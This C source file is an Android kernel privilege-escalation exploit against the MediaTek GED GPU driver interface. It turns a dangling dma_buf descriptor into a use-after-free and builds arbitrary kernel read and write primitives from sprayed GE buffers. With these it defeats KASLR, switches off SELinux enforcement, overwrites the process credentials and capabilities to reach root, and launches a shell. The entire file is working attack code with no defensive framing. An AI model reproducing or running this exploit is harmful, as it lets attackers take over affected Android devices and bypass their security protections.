#define _GNU_SOURCE
#include <sched.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include<sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/dma-heap.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <stdbool.h>
#include <sys/syscall.h>
#include <sys/eventfd.h>
#include <linux/membarrier.h>
#include <string.h>
#include <linux/dma-buf.h>
#include <ged_bridge_id.h>
#include "functions.h"
int membarrier(int cmd, unsigned int flags, int cpu_id) {
    return syscall(SYS_membarrier,cmd,flags,cpu_id);
}
void sync_rcu()
{
    if(membarrier(MEMBARRIER_CMD_GLOBAL,0,0) < 0)
    {
        printf("Failed membarrier: %m\nSleeping instead");
        sleep(1);
    }
}
unsigned long parse_fdinfo_count(int fd)
{
    const char* needle = "count:";
    char* fdinfo_buf = get_fdinfo(fd);
    // printf("%s\n",fdinfo_buf);
    char* count_pre = strstr(fdinfo_buf,needle);
    if(count_pre == NULL)
    {
        printf("Did not find needle!\n");
        return 0;
    }
    count_pre += strlen(needle);
    return strtoul(count_pre,NULL,16);

}
unsigned int stabilize_fd(int fd) {
    puts("stabilizing...");
    static int start_fd = 0x500;
    return dup2(fd,start_fd++);
}
struct GED_BRIDGE_IN_GE_ALLOC18 {
	int region_num;
	uint32_t region_sizes[18];
};
int ge_alloc(int ged_fd,unsigned size)
{
    struct GED_BRIDGE_PACKAGE package;
    struct GED_BRIDGE_IN_GE_ALLOC18 ge_alloc_in;
    struct GED_BRIDGE_OUT_GE_ALLOC ge_alloc_out;
    ge_alloc_in.region_num = 18;
    for(unsigned int i = 0; i < ge_alloc_in.region_num; i++)
    {
        ge_alloc_in.region_sizes[i] = size;
    }
    package.pvParamIn = &ge_alloc_in;
    package.pvParamOut = &ge_alloc_out;
    package.i32InBufferSize = 19 * sizeof(int);
    package.i32OutBufferSize = sizeof(ge_alloc_out);
    package.ui32FunctionID = GED_BRIDGE_COMMAND_GE_ALLOC;
    int ret = ioctl(ged_fd,0x6700,&package);
    if(ret < 0)
    {
        printf("Failed ge_alloc: %m\n");
        exit(0);
    }
    return ge_alloc_out.ge_fd;
}
static int ge_get(int ged_fd, int fd, int region_id,void* output_data,unsigned size) {
    struct GED_BRIDGE_IN_GE_GET ge_get_in = {
        .ge_fd = fd,
        .region_id = region_id,
        .uint32_offset = 0,
        .uint32_size = size / sizeof(unsigned)
    };
    struct GED_BRIDGE_OUT_GE_GET* ge_get_out = malloc(sizeof(struct GED_BRIDGE_OUT_GE_GET) + size);
    struct GED_BRIDGE_PACKAGE package =
    {
        .ui32FunctionID = GED_BRIDGE_COMMAND_GE_GET,
        .pvParamOut = ge_get_out,
        .pvParamIn = &ge_get_in,
        .i32InBufferSize = sizeof(struct GED_BRIDGE_IN_GE_GET),
        .i32OutBufferSize = sizeof(struct GED_BRIDGE_OUT_GE_GET) + size
    };
    int ret = ioctl(ged_fd,0x6700,&package);
    if(ge_get_out->eError)
    {
        printf("ge_get failed\n");
    }
    memcpy(output_data,ge_get_out->data,size);
    free(ge_get_out);
    return ret;
}
static int ge_set(int ged_fd,int fd, int region_id,void* input_data,unsigned size) {
    struct GED_BRIDGE_PACKAGE package;
    package.ui32FunctionID = GED_BRIDGE_COMMAND_GE_SET;
    struct GED_BRIDGE_IN_GE_SET* ge_set_in = malloc(sizeof(struct GED_BRIDGE_IN_GE_SET) + size);
    package.pvParamIn = ge_set_in;
    package.i32InBufferSize = sizeof(struct GED_BRIDGE_IN_GE_SET) + size;
    // printf("%d %d %d\n",sizeof(struct GED_BRIDGE_IN_GE_SET),size,package.i32InBufferSize);
    ge_set_in->ge_fd = fd;
    ge_set_in->region_id = region_id;
    ge_set_in->uint32_offset = 0;
    ge_set_in->uint32_size = size / sizeof(unsigned);
    memcpy(&ge_set_in->data,input_data,size);
    struct GED_BRIDGE_OUT_GE_SET ge_set_out;
    package.pvParamOut = &ge_set_out;
    package.i32OutBufferSize = sizeof(ge_set_out);
    int ret = ioctl(ged_fd,0x6700,&package);
    if(ge_set_out.eError)
    {
        printf("ge_set failed\n");
    }
    free(ge_set_in);
    return ret;
}
static uint64_t ge_info(int ged_fd,int fd)
{
    struct GED_BRIDGE_PACKAGE package;
    package.ui32FunctionID = GED_BRIDGE_COMMAND_GE_INFO;
    struct GED_BRIDGE_IN_GE_INFO ge_info_in;
    ge_info_in.ge_fd = fd;
    struct GED_BRIDGE_OUT_GE_INFO ge_info_out;
    package.pvParamIn = &ge_info_in;
    package.pvParamOut = &ge_info_out;
    package.i32InBufferSize = sizeof(ge_info_in);
    package.i32OutBufferSize = sizeof(ge_info_out);
    int ret = ioctl(ged_fd,0x6700,&package);
    return ret < 0 ? 0 : ge_info_out.unique_id;
}
static int ged_dmabuf_set_name(int ged_fd,int fd)
{
    struct GED_BRIDGE_IN_DMABUF_SET_NAME in = {
        .name = "abc",
        .share_fd = fd
    };
    struct GED_BRIDGE_OUT_DMABUF_SET_NAME out;
    struct GED_BRIDGE_PACKAGE package = {
        .ui32FunctionID = GED_BRIDGE_COMMAND_DMABUF_SET_NAME,
        .pvParamIn = &in,
        .pvParamOut = &out,
        .i32InBufferSize = sizeof(in),
        .i32OutBufferSize = sizeof(out)
    };
    ioctl(ged_fd,0x6700,&package);
    if(out.eError)
    {
        printf("SETTING NAME FAILED\n");
    }
    return out.eError;
}
void test_stub()
{
    int ged_fd = open("/proc/ged",O_RDONLY);
    if(ged_fd == -1) {
        printf("open ged: %m\n");
        exit(0);
    }
    int ge_fd = ge_alloc(ged_fd,256);
    printf("ge_fd: %d\n",ge_fd);
    int ret = ge_info(ged_fd,ge_fd);
    if(ret < 0)
    {
        printf("ge_info: %m\n");
    }
    else
    {
        printf("ge_info succeeded\n");
    }
    char data[256];
    memset(data,0x41,256);
    ret = ge_set(ged_fd,ge_fd,0,data,sizeof(data));
    if(ret < 0) {
        printf("ge_set: %m\n");
    }
    exit(0);
}
//Expects the fd to be stabilized
char* get_fdinfo(int fd)
{
    static char fdinfo_buf[128];
    sprintf(fdinfo_buf,"/proc/self/fdinfo/%d",fd);
    int fdinfo_fd = open(fdinfo_buf,O_RDONLY);
    if(fdinfo_fd == -1)
    {
        printf("open dangling fdinfo: %m");
    }
    // printf("fdinfo fd = %d\n",fdinfo_fd);
    int ret = read(fdinfo_fd,fdinfo_buf,sizeof(fdinfo_buf));
    if(ret < 0) {
        printf("Failed fdinfo read %m\n");
        exit(0);
    }
    close(fdinfo_fd);
    return fdinfo_buf;

}
struct {
    int ged_fd;
    int ge_fd;
    int region_id;
    int dangle_fd;
} dma_buf_ge_location = { 0 };
int get_dma_buf(struct dma_buf* db)
{
    return ge_get(dma_buf_ge_location.ged_fd,dma_buf_ge_location.ge_fd,dma_buf_ge_location.region_id,db,sizeof(*db));
}
int set_dma_buf(struct dma_buf* db)
{
    struct dma_buf db_check;
    ge_set(dma_buf_ge_location.ged_fd,dma_buf_ge_location.ge_fd,dma_buf_ge_location.region_id,db,sizeof(*db));
    get_dma_buf(&db_check);
    if(memcmp(db,&db_check,sizeof(*db)))
    {
        printf("failed to set dma_buf!!\n");
        exit(0);
    }
    return 0;
}
unsigned long arbitrary_read(unsigned long address)
{
    // printf("Reading address 0x%llx\n",address);
    const char* needle = "count:";
    struct dma_buf db = { 0 };
    static int fdinfo_fd = -1;
    if(fdinfo_fd < 0)
    {
        char fdinfo_filename[128];
        sprintf(fdinfo_filename,"/proc/self/fdinfo/%d",dma_buf_ge_location.dangle_fd);
        fdinfo_fd = open(fdinfo_filename,O_RDONLY);
        if(fdinfo_fd == -1)
        {
            printf("open dangling fdinfo: %m");
            exit(0);
        }
    }
    //If we don't do this we'll probably crash
    db.exp_name = (void*) address;
    db.size = 0x4141;
    //The best way to read arbitrary data would be the file count
    //read which provides a guaranteed unsigned long of data
    //So set the file location to the address I want to read minus the
    //offset to the f_count
    db.file = (void*) (address - 56);
    set_dma_buf(&db);
    lseek(fdinfo_fd,0,SEEK_SET);
    char fdinfo_buf[128];
    int ret = read(fdinfo_fd,fdinfo_buf,sizeof(fdinfo_buf));
    if(ret < 0) {
        printf("Failed fdinfo read %m\n");
        exit(0);
    }
    char* count_pre = strstr(fdinfo_buf,needle);
    if(count_pre == NULL)
    {
        printf("arb-read fail!! Did not find needle!\n");
        return 0;
    }
    count_pre += strlen(needle);
    return strtoul(count_pre,NULL,10) + 1;
}

int unshare_now = 0;
int clone_func(void* _)
{
    while(!unshare_now);
    unshare(CLONE_FILES);
    while(1)
        sleep(1000);
}
struct {
    int ged_fd;
    int victim_ge_fd;
    int reclaim_ge_fd;
    int reclaim_region_id;
    unsigned long geentry_pointer;
} stable_rw;
void stable_arb_read(unsigned long address,void* buffer, unsigned size);
void stable_arb_write(unsigned long address,void* buffer, unsigned size);
int ged_fd;
int final_reclaim_ge_fd;
int other_ge_fds[GE_SPRAY_SIZE];
unsigned long kernel_base;
int pidfd;
//Now we have an fd to a free struct file
void exploit_dangling_fd(int fd,int freeme)
{
    dma_buf_ge_location.dangle_fd = fd;
    //Assuming that caller already stabilized the fd
    //stabilize_fd(fd);
    // printf("%s\n",get_fdinfo(fd));
    int ret;
    //We specifically *don't* want any of these fd's to reclaim the freed fd
    //So we use a cpu that I've never seen an fd free occur on
    set_cpu(2);


    char buffer[512];
    printf("attempting to reclaim dma buf memory...\n");
    memset(buffer,0x0,sizeof(buffer));
    // buffer[12] = 0x41;
    for(unsigned int j = 0; j < GE_SPRAY_SIZE; j++) {
        set_cpu(j % 7);

        for(unsigned int i = 0; i < 18; i++) {
            ge_set(ged_fd,other_ge_fds[j],i,buffer,512);
        }
    }
    printf("setting name...\n");
    //Trying to use the normal ioctl DMA_SET_NAME path on just the fd
    //Causes crashes inside of SELinux-related inode lookup
    //So instead we use the GED dmabuf set name and that works great!
    ret = ged_dmabuf_set_name(ged_fd,fd);
    printf("Searching for pointer...\n");
    unsigned long name_pointer;
    for(unsigned int fd_index = 0; fd_index < GE_SPRAY_SIZE; fd_index++)
    {
        for(unsigned int region_id = 0; region_id < 18; region_id++)
        {
            ge_get(ged_fd,other_ge_fds[fd_index],region_id,buffer,sizeof(buffer));
            if(*((unsigned long*) (buffer + 112)))
            {
                name_pointer = *((unsigned long*) (buffer + 112));
                printf("name pointer discovered: %p\n",name_pointer);
                printf("index: %u ; region_id: %u\n",fd_index,region_id);
                dma_buf_ge_location.ge_fd = other_ge_fds[fd_index];
                dma_buf_ge_location.ged_fd = ged_fd;
                dma_buf_ge_location.region_id = region_id;
                fd_index = GE_SPRAY_SIZE;
                break;
            }
        }
    }

    if(!dma_buf_ge_location.ge_fd) {
        // for(unsigned int j = 0; j < GE_SPRAY_SIZE; j++) {

        // // set_cpu(j % 7);

        //     for(unsigned int i = 0; i < 18; i++) {
        //         for(unsigned int k = 0; k < 512; k += 2) {
        //             buffer[k] = j;
        //             buffer[k+1] = i;
        //         }

        //         ge_set(ged_fd,other_ge_fds[j],i,buffer,512);
        //     }
        // }
        printf("Unable to find name pointer\n");
        printf("%s\n",get_fdinfo(fd));
        exit(0);
    }
    set_cpu(2);
    struct dma_buf db;
    get_dma_buf(&db);
    if(db.name != (char*) name_pointer)
    {
        printf("WARN: db.name fetch did not equal name_pointer.\nSomething wrong with get_dma_buf\n%p != %p\n",db.name,name_pointer);
    }
    printf("name pointer read: 0x%llx\n",arbitrary_read(name_pointer));

    //Just made some allocator noise so let's start over.
    //I can change the dma_buf to whatever I want, then call operations on it
    db.name = NULL;
    //Remove the name from the dmabuf
    set_dma_buf(&db);
    //Allocate a new name. This pointer comes from the active slab ~31/32 times
    ged_dmabuf_set_name(ged_fd,fd);
    get_dma_buf(&db);
    //Now I have the pointer to the new name at db.name
    
    //Set the name again, allocating from the slab. The real goal is to free
    //the last name pointer though.
    ged_dmabuf_set_name(ged_fd,fd);
    int victim_ge_fd = ge_alloc(ged_fd,128);
    //Allocate 32 fdtables, completely filling up the active slab
    //now the previous name pointer should be allocated with an fdtable
    puts("Unsharing...");
    unshare_now = 1;
    sleep(1);
    // set_cpu(2);
    if(arbitrary_read((unsigned long) db.name) != 0x800)
    {
        printf("failed to reallocate I think...\n");
        exit(1);
    }
    //Now we know where an fdtable is. Find a ge fd
    //Find the fd array in the fdtable
    unsigned long fd_array = arbitrary_read((unsigned long) db.name + 8);
    //Find the ge fd struct file in the fd array
    unsigned long geentry_file = arbitrary_read(fd_array + victim_ge_fd * 8);
    //Find the private_data (struct GEEntry) in the ge fd
    unsigned long ge_private_data = arbitrary_read(geentry_file + 216);
    //Verify we probably have the struct GEEntry
    if(arbitrary_read(ge_private_data + 8) != geentry_file)
    {
        printf("GEEntry read didn't make sense!\n");
        printf("ge_entry_file was %p but read file from private_data was %p\n",geentry_file,arbitrary_read(ge_private_data + 8));
        exit(1);
    }
    //Find the freed struct file in the fd array
    unsigned long freed_file = arbitrary_read(fd_array + fd * 8);
    //Get the dma_buf_ops - now we know the KASLR slide.
    //TODO calculate the offset and stuff, need a boot.img or need to get clever
    unsigned long dma_buf_ops = arbitrary_read(freed_file + 40);
    unsigned long dma_buf_ops_offset = 0xffffffc00a25b480 - DEFAULT_KERNEL_BASE;
    kernel_base = dma_buf_ops - dma_buf_ops_offset;

    printf("dma_buf_ops: 0x%llx\nkernel_base: 0x%llx\n",dma_buf_ops,kernel_base);
    //Get the array used to keep track of ge buffers
    unsigned long geentry_data = arbitrary_read(ge_private_data + 24);
    //Free it. We make the db name the geentry area through our ged ge reclaim
    db.name = (char*) geentry_data;
    set_dma_buf(&db);
    memset(buffer,0,256);
    //Set up the sizes for the GEEntry array so I can confirm working
    //by setting an array via the GE file and seeing it in the backing store
    unsigned* sizes = (unsigned*) buffer;
    for(unsigned int i = 0; i < 18; i++) {
        sizes[i] = 128;
    }
    //Then we set the name, freeing the previous name, which is the geentry area
    ged_dmabuf_set_name(ged_fd,fd);
    //Now reclaim with ge buffers
    for(unsigned int i = 0; i < 18; i++) {
        ge_set(ged_fd,final_reclaim_ge_fd,i,buffer,256);
    }
    memset(buffer,0x41,128);
    ge_set(ged_fd,victim_ge_fd,0,buffer,128);
    for(unsigned int i = 0; i < 18; i++) {
        ge_get(ged_fd,final_reclaim_ge_fd,i,buffer,256);
        if(buffer[sizeof(unsigned) * 18 + 7])
        {
            //Detected the array - or more precisely an entry in the array
            stable_rw.ged_fd = ged_fd;
            stable_rw.reclaim_ge_fd = final_reclaim_ge_fd;
            stable_rw.victim_ge_fd = victim_ge_fd;
            stable_rw.reclaim_region_id = i;
            stable_rw.geentry_pointer = geentry_data;
            printf("Got a stable arb rw at %u, read value %llx\n",i,*(unsigned long*) &buffer[sizeof(unsigned) * 18]);
            if(arbitrary_read(*(unsigned long*) &buffer[sizeof(unsigned) * 18]) != 0x4141414141414141)
                printf("but the pointer doesn't have the buffer I expected?\n");
            break;
        }
    }
    if(stable_rw.ged_fd == 0)
    {
        printf("failed to get stable arb rw\n");
        exit(0);
    }
    unsigned long stable_rw_check = 0;
    stable_arb_read(geentry_file + 216,&stable_rw_check,8);
    if(stable_rw_check != arbitrary_read(geentry_file + 216))
    {
        printf("Failed stable arb read check\n");
    }
    printf("0x%llx 0x%llx\n",stable_rw_check,arbitrary_read(geentry_file + 216));
    printf("Freed file f_count is %llx\n",arbitrary_read(freed_file + 56));
    stable_rw_check = 0x41414141;
    //This stable write plays a secondary role of making sure the
    //unstable UAF dma_buf doesn't get freed on exit
    stable_arb_write(freed_file + 56,&stable_rw_check,8);
    if(stable_rw_check + 1 != arbitrary_read(freed_file + 56))
    {
        printf("Failed stable arb write check, got %llx\n",arbitrary_read(freed_file + 56));
        stable_arb_write(0x4141414141414141,&stable_rw_check,8);
        printf("Somehow did not explode??\n");
        stable_arb_read(0x4141414141414141,&stable_rw_check,8);
        stable_arb_read(0x1,&stable_rw_check,8);
        stable_arb_read(0xffffffffffffffff,&stable_rw_check,8);
        printf("Somehow did not explode on arb read??\n");
        sleep(1);
    }
    unsigned long selinux_state = CALC_ADDRESS(0xffffffc00aa2fb88);
    printf("selinux_state addr: 0x%llx\n",selinux_state);
    unsigned long status_page = 0;
    unsigned int cur_state = 0;
    stable_arb_read(selinux_state,&cur_state,4);
    cur_state &= 0xFFFFFF00;
    stable_arb_write(selinux_state,&cur_state,4);
    stable_arb_read(selinux_state + 16,&status_page,sizeof(status_page));

    if(!status_page)
    {
        printf("failed to read status page\n");
        exit(0);
    }
    printf("selinux status page: 0x%llx\n",status_page);
    unsigned long status_virt_addr = ((status_page << 6) + 0xFFFFC008000000LL) & 0xFFFFFFFFFFF000LL | 0xFF00000000000000LL;
    printf("selinux status virt addr: 0x%llx\n",status_virt_addr);
    unsigned new_enforce = 0;
    stable_arb_read(status_virt_addr + 8,&new_enforce,4);
    printf("Current enforcing: %u\n",new_enforce);
    new_enforce = 0;
    stable_arb_write(status_virt_addr + 8,&new_enforce,4);
    new_enforce = 0x41;
    stable_arb_read(status_virt_addr + 8,&new_enforce,4);
    if(new_enforce == 0x41)
    {
        printf("Failed to read\n");
    }
    stable_arb_read(status_virt_addr + 8,&new_enforce,4);
    stable_arb_read(selinux_state,&cur_state,4);
    printf("Current enforcing: %u %u\n",new_enforce,cur_state & 0x000000FF);
    unsigned long pidfd_file;
    stable_arb_read(fd_array + pidfd * 8,&pidfd_file,sizeof(pidfd_file));
    printf("pidfd file: 0x%llx\n",pidfd_file);
    unsigned long structpid;
    stable_arb_read(pidfd_file + 216,&structpid,sizeof(structpid));
    printf("pid struct: 0x%llx\n",structpid);
    unsigned long task_struct;
    stable_arb_read(structpid + 16,&task_struct,sizeof(task_struct));
    //This is the offset in the task struct that the hlist node pointer has
    //So we decrement to get to the base task struct
    task_struct -= 1592;
    printf("task_struct: 0x%llx\n",task_struct);

    unsigned long cred_struct;
    stable_arb_read(task_struct + 1920,&cred_struct,sizeof(cred_struct));
    printf("cred_struct: 0x%llx\n",cred_struct);
    int new_creds[8] = { 0 };
    stable_arb_write(cred_struct + 4,new_creds,sizeof(new_creds));
    if(getuid())
    {
        printf("hmmm setting uid failed?");
    }
    unsigned int caps[5][2] = {{0xffffffff,0x000001ff},{0xffffffff,0x000001ff},{0xffffffff,0x000001ff},{0xffffffff,0x000001ff},{0xffffffff,0x000001ff}};
    stable_arb_write(cred_struct + 40, caps,sizeof(caps));
    int status_fd = open("/proc/self/status",O_RDONLY);
    char status_buffer[4096];
    read(status_fd,status_buffer,sizeof(status_buffer));
    printf("%s\n",status_buffer);
    printf("starting shell...");
    execlp("/system/bin/sh","sh",NULL);
    exit(0);
   
}
void stable_arb_read(unsigned long address,void* buffer, unsigned size)
{
    static unsigned* reclaim_data = NULL;
    static unsigned* region_sizes;
    static unsigned** region_data;
    if(size & 3)
    {
        static bool once = false;
        if(!once) printf("WARN: cannot do a clean arb rw of non 4-byte aligned memory");
        once = true;
        size += 4;
    }
    if(reclaim_data == NULL)
    {
        reclaim_data = malloc((sizeof(uint32_t) + sizeof(uint32_t *)) * 18);
        region_sizes = reclaim_data;
        region_data = (uint32_t **)(region_sizes + 18);
    }
    region_sizes[0] = size + 4;
    region_data[0] = (unsigned*) address;
    // for(unsigned i = 0; i < 27; i++) {
    //     printf("%llx = 0x%llx\n",stable_rw.geentry_pointer + i * 8,arbitrary_read(stable_rw.geentry_pointer + i * 8));
    // }
    // puts("");
    ge_set(stable_rw.ged_fd,stable_rw.reclaim_ge_fd,stable_rw.reclaim_region_id,reclaim_data,(sizeof(uint32_t) + sizeof(uint32_t *)) * 18);
    // for(unsigned i = 0; i < 27; i++) {
    //     printf("%llx = 0x%llx\n",stable_rw.geentry_pointer + i * 8,arbitrary_read(stable_rw.geentry_pointer + i * 8));
    // }
    // puts("");
    ge_get(stable_rw.ged_fd,stable_rw.victim_ge_fd,0,buffer,size);

}
void stable_arb_write(unsigned long address,void* buffer, unsigned size)
{
    static unsigned* reclaim_data = NULL;
    static unsigned* region_sizes;
    static unsigned** region_data;
    if(size & 3)
    {
        static bool once = false;
        if(!once) printf("WARN: cannot do a clean arb rw of non 4-byte aligned memory");
        once = true;
        size += 4;
    }
    if(reclaim_data == NULL)
    {
        reclaim_data = malloc((sizeof(uint32_t) + sizeof(uint32_t *)) * 18);
        region_sizes = reclaim_data;
        region_data = (uint32_t **)(region_sizes + 18);
    }
    region_sizes[0] = size + 4;
    region_data[0] = (unsigned*) address;
    ge_set(stable_rw.ged_fd,stable_rw.reclaim_ge_fd,stable_rw.reclaim_region_id,reclaim_data,(sizeof(uint32_t) + sizeof(uint32_t *)) * 18);
    ge_set(stable_rw.ged_fd,stable_rw.victim_ge_fd,0,buffer,size);
}